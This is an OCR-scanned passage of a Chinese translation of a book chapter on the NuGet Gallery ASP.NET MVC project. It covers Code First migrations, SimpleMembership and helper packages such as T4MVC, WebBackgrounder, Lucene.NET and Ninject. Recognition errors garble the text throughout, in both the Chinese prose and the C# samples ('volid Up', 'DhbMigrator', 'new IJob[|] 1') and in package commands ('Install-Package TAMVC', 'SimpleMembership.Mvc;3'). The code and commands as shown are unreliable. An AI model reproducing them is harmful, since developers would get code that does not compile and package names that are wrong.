这 201201031925005_AddpasswordHash.cs 

， 吻 201203180016174_CuratedFeeds.cs 
| 201203180320147_ChangeCuratedFeedldToName.cs 


划 201203182132476_CuratedPackages.cs 
#4| MigrationsConfiguration.cs 


图 16-8 


显然 ， 名 为 201110060711357 Initialcs 的 迁移 是 开端 。 它 创建 了 初始 的 表 集 。 此 后 ， 
当 我 们 开发 的 网 站 发 生 改变 时 ， 每 个 迁移 都 会 应 用 模式 改变 。 

使 用 NuGet Package Manager Console 创建 迁移 。 例 如 ， 假 设 我 们 在 User 类 中 有 一 个 
Age 属性 。 我 们 可 以 打开 Package Manager Console， 运 行 下 面 的 命令 : 


Add—Migration AddAgeToUser 


命令 Add-Migration 可 以 添加 一 个 新 迁移 ，AddAgeToUser 是 迁移 名 称 。 笔 者 尝试 挑选 
一 些 描述 内 容 ， 以 便 能 记得 迁移 做 哪些 改变 。 这 样 会 生成 一 个 名 为 201204292258426_ 
AddAgeToUser.cs 的 文件 ， 迁 移 代 码 如 程序 清单 16-3 所 示 。 
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程序 清单 16-3: 201204292258426_AddAgeToUser.cs 迁移 


namespace NuGetGallery.Migrations 


{ 
UsSlIng System.Data.Entity.Migrations; 
public partial class AddAgeToUser : DbMigration 
{ 
Public override volid Up () 
{ 
AddColumn ("Users", "Age", C => C.Int(nullable: false)); 
} 
public override voild Down () 
{ 
DropColumn ("Users"”, "Age™}; 
} 
} 
} 


太 棒 了 了， 竟然 可 以 检测 实体 的 改变 ， 并 为 我 们 创建 合适 的 迁移 。 现 在 可 以 目 由 地 编辑 
迁移 ， 如 果 需 要 目 定义 的 话 ， 但 在 大 多 数 情况 下 我 没 必 要 跟踪 开发 的 每 一 点 变化 。 当 然 ， 
也 存在 一 些 修改 ， 不 能 目 动 地 为 它们 创建 迁移 。 例 如 ， 我 们 有 一 个 Name 属性 ， 现 在 决定 
把 它 分 成 两 个 属性 一 一 FirstName 和 LastName， 此 时 就 需要 自己 编写 迁移 代码 。 但 对 于 简 
单 的 改变 ， 这 的 确 很 棒 。 

当 开 发 代码 时 ， 其 他 人 可 能 也 在 代码 中 添加 了 一 些 迁 移 。 通 稼 情况 下 ， 我 们 会 执行 
Update-Database 命令 ， 运 行 所 有 尚未 应 用 到 本 地 数据 库 的 迁移 。 同 样 ， 当 我 们 部 团 应 用 程 
序 时 ， 我 们 需要 运行 针对 这 个 产品 网 站 的 所 有 迁移 。 

在 每 次 运行 网 站 时 , NuGet Gallery 代 但 库 目 动 运行 迁移 。 再 次 , 我 们 回 到 AppActivatorcs， 
看 它 是 如 何 配置 的 。DbMigratorPostStart 方法 使 用 下 面 两 行 代码 来 实现 自动 迁移 和 自动 
运行 : 

Var dbMigrator = new DhbMigrator (new MigrationsConfiguration()); 

dbMigrator.Update (}); 

MigrationsConfiguration 类 是 DbMigrationsConfiguration 类 的 派生 类 , 其 中 包含 对 Code 
First Migrations 的 目 定义 配置 。 重 写 在 迁移 执行 之 后 运行 的 Seed 方法 来 创建 初始 种 子 数据 。 
在 笠 试 创建 之 前 ， 确 保 Seed 方法 检查 数据 的 存在 。 例 如 ，NuGet Gallery 重 与 Seed 方法 ， 
并 添加 “Admins” 角 色 ( 如 条 它 不 存在 的 话 )。 在 构造 函数 中 ， 我 们 禁用 目 动 迁移 : 

public MigratijonsConftiguration () 

AutomaticMigrationsEnabled = false; 

} 

这 是 个 人 喜好 , 我 们 大 多 数 人 喜欢 明确 迁移 。 当 其 中 目 动 迁移 时 ，Code First Migrations 
会 自动 执行 迁移 ， 以 确保 数据 库 匹 配 当前 的 代码 状态 。 因 此 ， 在 向 User 类 添加 Age 属 
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性 的 例子 中 ， 我 们 不 需要 运行 Add-Migration 命令 。 而 只 需 运 行 PowerShell 命令 一 一 

Update-Database，Code First 会 日 动 处 理 。 由 于 不 能 确保 每 个 改变 目 动 完成 , 因此 Code First 

可 以 混合 使 用 明确 迁移 和 上 自动 迁移 。 对 笔者 来 说 ， 这 有 点 太 神 奇 ， 但 最 好 还 是 目 己 尝试 
下 


16.8 成 员 资格 


在 2007 年 ， 当 第 一 次 作为 ASPNET 2.0 的 一 部 分 发 布 时 ， 原 始 的 ASPNET 成 员 资格 
(Membership) 提 供 占 对 于 用 户 和 和 角色 管理 非常 有 用 。 然 而 ， 随 大 时 间 的 推移 ， 它 开始 显得 
有 些 过 时 ， 不 能 支持 现代 网 站 使 用 的 一 些 工 作 流 程 。 例 如 ， 当 用 户 态 记 密 码 时 ， 通 常 做 法 
是 网 站 发 送 一 封包 含有 单 击 URL 的 邮件 ，URL 中 包含 一 个 在 一 定时 间 间 隅 内 有 效 的 确认 
令 牌 。 用 户 单 击 URL 访问 允许 其 修改 密码 的 页 面 ,最 后 用 户 完 成 密码 重 置 。 这 个 工作 流程 
使 用 标准 的 成 员 资 格 难 以 实现 。 

成 员 资 格 的 另 一 个 限制 是 ， 集 成 用 户 数据 与 其 他 认证 系统 是 一 个 非常 大 的 挑战 。 可 喜 
的 是 ，ASPNET 团队 使 用 新 的 SimpleMembership 特征 有 效 地 解决 了 这 些 问题 。 

SimpleMembership 最 初 为 ASPNET Web Pages 而 编写 ， 后 来 ASPNET 团队 把 它 包 含 
进 ASPNET MVC 4。 与 其 说 SimpleMembership 是 一 个 框架 ， 还 不 如 说 它 是 一 个 库 。 定 义 
合适 的 Users 表 ， 让 SimpleMembership 处 理 赁 据 。 我 们 所 需要 做 的 了 加 是 通过 提供 表 名 和 用 
户 名 /e-mail 列 ， 告 诉 SimpleMembership 如 何 使 用 凭据 匹配 我 们 数据 库 中 的 用 户 。 

使 用 SimpleMembership 处 理 的 方法 提供 一 个 方法 库 ， 以 便 安 全 地 存储 密码 ， 与 其 他 认 
证 提供 堪 集 成 等 。 这 意味 痢 像 密码 重 置 这 样 的 功能 不 是 自动 的 。 实 现 各 种 成 员 资 格 工作 流 
程 还 需要 我 们 做 一 些 工 作 。 但 好 处 是 我 们 不 用 局 限于 SimpleMembership 设计 者 使 用 的 工作 
流程 ， 这 点 与 ASPNET 的 MembershipProvider 不 同 。SimpleMembership 库 提 供 了 大 量 的 
有 用 函数 ， 可 以 帮助 我 们 容易 地 实现 我 们 想象 的 任何 成 员 资 格 工作 流程 。 

SimpleMembership 的 一 个 缺点 是 ， 它 最 初 为 ASPNET Web Pages 设计 。ASPNET Web 
Pages 是 一 个 基于 页 面 的 简单 Web 框架 ， 它 设计 的 目标 用 户 是 业余 爱好 者 、 宽 泛 的 开发 人 
员 、 快 速 原型 制作 者 和 那些 喜欢 内 构 样 式 的 Web 开发 人 员 。 这 意味 看 WebSecurity 类 只 由 
静态 方法 组 成 ， 这 使 得 为 那些 调用 SimpleMembership 的 代码 编写 单元 测试 极 具 挑战 性 。 

对 运 的 是 ， 为 了 满足 单元 测试 的 需要 ， 有 人 利用 它 编 写 了 基于 接口 的 SimpleMembership 
打包 方法 ， 比 如 SimpleMembership.Mvc3 包 。 希 望 我 们 读 到 这 些 内 容 时 ,也 有 了 MVC 4 
版 本 ， 尽 管 MVC 3 版 本 仍 能 很 好 地 工作 。 


Install-Package SimpleMembership.Mvc;3 


这 是 一 个 很 好 的 方法 ,但 不 是 我 们 在 NuGet Gallery 中 做 的 .我 们 使 用 一 个 传统 的 Users 
数据 库 来 处 理 那 些 使 用 不 同 存储 格式 的 哈 希 密码 。 当 把 新 用 户 迁 移 到 更 标准 的 方法 存储 哈 
硕 密 码 时 ， 我 们 需要 确保 现 有 存储 密码 的 癌 后 兼容 性 。 
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我 们 可 以 编写 自己 的 接口 ， 比 如 IUserService 和 IFormsAuthenticationService。 如 果 仔 
细 观 察 代 码 ， 会 发 现 接 口 方 法 和 实现 与 SimpleMembership 非常 相似 。 


注意 ”相似 并 非 偶 然 。SimpleMembership 的 项 目 经 理 也 为 SimpleMem- 
bership 编写 了 WebMatrix 模板 ， 此 外 ， 还 为 NuGet Gallery 实现 了 认证 接口 。 
他 也 是 本 章 的 编写 者 ， 他 不 想 让 它 出 局 ， 他 编写 了 一 个 没有 怎么 经 过 测试 的 
API。 他 说 他 只 是 在 做 自己 的 本 职工 作 . 


查看 UsersController。 它 为 成 员 资格 实现 了 User Interface 工作 流程 代码 ， 虽 然 仿 照 
WebMatrix 中 包含 的 默认 ASPNET Web Pages 项 目 模板 ， 但 它 以 一 种 干净 可 测试 的 方式 
编写 。 

如 果 从 头 创建 一 个 新 的 Web 应 用 程序 ， 笔 者 可 能 采用 与 使 用 NuGet Gallery 相同 的 方 
法 ， 但 笔者 拥有 我 们 接口 的 具体 实现 ， 只 需 调 用 WebSecurity 类 。 


16.9 其 他 有 用 的 NuGet 包 


正如 上 面 提 到 的 ,经 验 教训 和 我 们 用 来 构建 NuGet Gallery 的 工具 可 以 写成 一 本 书 。 前 
面 的 章节 介绍 了 几乎 每 个 Web 应 用 程序 都 会 用 到 的 功能 ， 比 如 管理 节 、 性 能 解析 和 错误 日 
志 等 。 

本 节 快 速 介绍 一 些 在 NuGet Gallery 中 使 用 的 包 ， 虽 然 大 部 分 应 用 程序 都 不 需要 这 些 
包 ， 但 当 我 们 需要 的 时 候 ， 它 们 却 非常 有 用 。 每 一 小 节 以 安装 包 的 命令 开始 。 
16.9.1 T4MVC 

Install-Package TAMVC 

T4MVCOttp:/nugetorg/packages/T4MVC) 安 装 了 一 个 可 以 为 ASPNET MVC 生成 强 类 
型 辅助 方法 的 T4 模板 ， 它 的 作者 是 David Ebbo。 例 如 ， 当 我 们 需要 一 个 操作 链接 时 ， 我 


QHtml .ActionLink("Delete Book™", "Delete™", "Books", new { id = Model.Id}, null) 
而 只 需要 编写 : 
QHtml .ActionLink ("Delete Book", MVC.Books.Delete (Model] .Id)) 


如 果 如 欢 智 能 感知 的 话 ， 会 觉得 这 非常 方便 ， 因 为 它 可 以 提供 一 个 可 使 用 的 控制 融和 


操作 列表 。 
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16.9.2 WebBackgrounder 


Install-Package WebBackgrounder 


WebBackerounder(http://nuget.org/packages/WebBackegrounder) 包 可 以 安全 地 运行 ASPNET 
应 用 程序 中 反复 出 现在 后 台 的 任务 。ASPNET 和 IIS 随时 都 可 以 自由 地 终止 我 们 应 用 程序 
的 AppDomain。ASPNET 提供 机 人 制 来 通知 代码 终止 时 间 。WebBacksgrounder 利用 这 一 点 可 
以 尝试 为 那些 反复 出 现 的 运行 任务 安全 地 运行 一 个 后 台 定时 器 。 

在 进度 中 ，WebBackgrounder 是 一 个 非常 早期 的 工作 ,但 NuGet Gallery 使 用 它 来 定期 
更 新 下 载 统计 , 更 新 Lucene.NET 索引 。 正如 我 们 期 望 的 , WebBackegrounder 在 AppActivator 
中 ， 通 过 下 面 两 个 方法 配置 : 


private static vold BackgroundJobspostSsStart() 
{ 
Var Jobs = new IJob[|] 1 
new UpdateStatisticsJob (TimeSpan.FromSeconds (10) ， 
() => new EntitiesContext (), timeout: TimeSpan.FromMinutes (2)), 
new WorkItemCleanupJob (TimeSpan.FromDays (1), 
() => new EntijtiesContext(), timeout: TimeSpan.FromDays (4)), 
new LucenelIndexingJob (TimeSpan.FromMinutes (10) ， 
timeout: TimeSpan.FromMinutes (2)), 
}; 
var JobCoordinator = new WebFarmJobCoordinator (new 
EntityWorkIitemRepository 


( 
() => new EntitiesContext ()})}); 
JobManager = new JobManager (Jobs, JobCoordinator); 
JobManager.Fail(e => ErrorLog.GetDefault (null) .Log (new Error(e))); 
JobManager.start () 7 
} 


private static void BackgroundJobsstop() 
{ 


JobManager .Dispose (); 


} 


第 一 个 方法 BackgroundJobsPostStart 创建 一 个 先前 运行 作业 的 数组 。 每 个 作业 包含 
个 时 间 间 隔 ， 表 示 筷 们 隅 多 长 时 间 运 行 一 次 。 人 例如， 我们 每 隔 10 秒 更 新 下 载 数 量 统计 。 

接 下 来 的 代码 创建 了 一 个 任务 协调 器 。 如 果 应 用 程序 只 是 运行 在 一 台 服 务 嚣 上， 我 们 

只 需 使 用 pe 由 于 NuGet Gallery 运行 在 Windows Azure 上 ,因此 ， 

它 是 一 个 非常 有 效 的 Web Farm， 这 里 Web Farm 要 求 WebFarmJobCoordinator 人 确保 同样 的 
任务 不 能 同时 运行 在 多 台 服 务 器 上 。 这 样 WebBackgrounder 就 可 以 上 自动 把 工作 展开 到 多 个 
机 器 上 。 为 了 同步 操作 ， 协 调 器 需要 一 些 中心 “ 库 ”。 

我 们 决定 使 用 数据 库 ， 因 为 我 们 每 个 场地 (farm) 都 只 有 一 个 数据 库 ， 因 此 它 就 是 中 心 ， 
安装 WebBackgrounder.EntityFramework 包 把 它 连 接 起 来 。 
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16.9.3 Lucene.NET 


Install-Package Lucene .NET 


Lucene.NET(http://nuget.oreg/packages/Lucene.Net) 是 Apache Lucene 搜索 库 的 开源 部 分 。 
它 是 .NET 最 有 名 的 文本 搜索 引擎 。NuGet Gallery 使 用 它 增 强 包 搜 索 功能 。 

因为 它 是 Java 库 的 一 部 分 ， 相 对 于 那些 使 用 .NET API 的 包 ， 它 的 API 和 配置 有 点 第 
重 。 但 成 功 配置 后 ， 它 的 功能 非常 强大 ， 而 且 速 度 很 快 。 

如 何 配置 Lucene.NET 超出 了 本 书 的 讨论 范围 。NuGet Gallery 把 Lucene.NET 功能 封装 
在 了 LuceneIndexingService 类 中 。 这 提供 了 一 个 如 何 与 Lucene 相 接 的 范例 。 也 可 以 查看 
LuceneIndexingJob。 这 是 一 个 WebBackerounder 任务 ， 每 阳 10 分 钟 会 被 调用 一 次 。 


16.9.4 AnglicanGeek.MarkdownMaliler 


Install-Package AnglicanGeek.MarkdownMaller 


AnglicanGeek.MarkdownMailer(http://nuget.org/packages/AnglicanGeek.MarkdownMailer) 
是 一 个 发 送 邮件 的 简单 库 。 它 的 强大 之 处 在 于 我 们 可 以 使 用 Markdown 语法 定义 e-mail 内 
容 ， 它 能 够 为 同时 包含 文本 和 HTML 的 视图 生成 一 个 包含 多 个 部 分 的 e-mail。 

NuGet Gallery 使 用 这 一 功能 发 送 所 有 的 通知 e-mail， 比 如 发 给 新 用 户 的 邮件 ， 或 者 密 
码 重 置 邮 件 。MessageService 类 中 包含 NuGet Gallery 使 用 AnglicanGeek.MarkdownMailer 
库 的 例子 ， 可 供 人 三 阅 。 


16.9.5 Ninject 


Install-Package Ninject 


.NET 框架 有 很 多 依赖 注入 (DD 框架 。NuGet Gallery 团队 选择 Ninject(http://nuget.org/ 
packages/NuGet) 作 为 它 的 依赖 注入 容 颖 ， 主 要 是 因为 它 干 净 的 API 和 速度 。 

Ninject 是 一 个 核心 库 。Ninject.Mvc3 包 为 ASPNET MVC 项 目 配置 Ninject。 它 使 得 
Ninject 入 门 变 得 简单 而 容易 。 

下 如 前 面 提 到 的 ， 所 有 NuGet Gallery 的 Ninject 绑 定 都 在 类 ContainerBindings 中 。 下 
面 是 从 类 ContainerBindings 中 选取 的 两 个 绑 定 示例 : 


Bind<ISearchService>() .To<LuceneSearchService>() .InRequestScope (); 


Bind<IFormsAuthenticationService>{() 
.To<EFoOrmsAuthenticationService>() 
-InSingletonScope ();，; 
第 一 行 代 公 把 LuceneSearchService 注册 为 一 个 具体 的 ISearchService 实例 。 这 样 我 们 
就 可 以 保持 类 的 低 厢 合 。 在 整个 代码 库 中 ， 类 只 引用 ISearchService 接口 。 这 样 为 单元 测 
试 过 程 提供 模拟 类 束 变 得 非常 简单 。 在 运行 时 , Ninject 注入 一 个 具体 实现 。 InRequestScope 
确保 为 每 个 请 求 创建 一 个 新 实例 。 如 果 类 在 它 的 构造 函数 中 需要 请 求 数据 的 话 ， 这 样 做 是 
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很 重要 的 。 

第 二 个 绑 定 做 同样 的 事情 ， 但 是 InSingletonScope 需要 确保 在 整个 应 用 程序 中 只 有 一 
个 FormsAuthenticationService 实例 。 如 果 服 务 需 要 任何 请 求 状态 ， 或 者 在 它 的 构造 函数 中 
需要 请 求 状态 ， 请 务必 确保 使 用 请 求 范围 ， 而 不 是 单 例 。 


16.10 小结 


任何 一 个 项 目 让 两 个 开发 人 员 开 发 时 ， 对 如 何 构建 程序 ， 他 们 可 能 会 持 不 同 看 法 。 
NuGet Gallery 也 不 例外 。 甚 至 从 事 NuGet Gallery 开发 的 每 个 开发 人 员 对 如 何 构建 持 有 的 
看 法 都 各 不 相同 。 

NuGet Gallery 只 是 真实 世界 应 用 程序 出 现 无 限 可 能 性 的 一 个 例子 。 这 里 不 打算 把 它 作 
为 一 个 正确 构建 ASPNET MVC 应 用 程序 的 范例 。 

它 唯 一 的 目标 是 满足 NuGet Gallery 托管 NuGet 包 的 需要 。 人 至 今 为 止 ， 它 的 效果 非常 
好 ， 尽 管 有 时 会 出 现 这 样 或 那样 的 问题 。 

然而 ， 笔 者 认为 创建 NuGet Gallery 的 一 个 方面 可 以 普遍 适用 于 每 个 开发 人 员 。NuGet 
队 之 所 以 能 够 快速 高 质量 地 创建 NuGet Gallery， 主 要 是 因为 他 们 利用 了 很 多 社区 创建 的 
有 用 软件 包 。 利 用 已 有 的 软件 包 能 够 帮助 我 们 快速 高 质量 地 开发 软件 ， 因 此 ， 花 费时 间 浏 
览 NuGet Gallery 是 值得 的 。 除 了 NuGet Gallery 代码 中 使 用 的 包 ， 还 有 很 多 非常 优质 的 软 
件 包 。 

如 果 想 着 手 开发 一 个 真实 世界 的 ASPNET MVC 应 用 程序 ， 为 什么 不 考虑 帮助 摆脱 困 
境 呢 ? NuGet Gallery 是 一 个 开源 项 目 ，NuGet 团队 欢迎 大 家 踊跃 参加 。 查 看 我 们 的 问题 清 
单 https://github.com/nuget/nugetgallery/issues， 或 者 加 入 我 们 的 JabbR 聊天 室 http://jabbr.net/ 


#/r00OMms/nuget.。 
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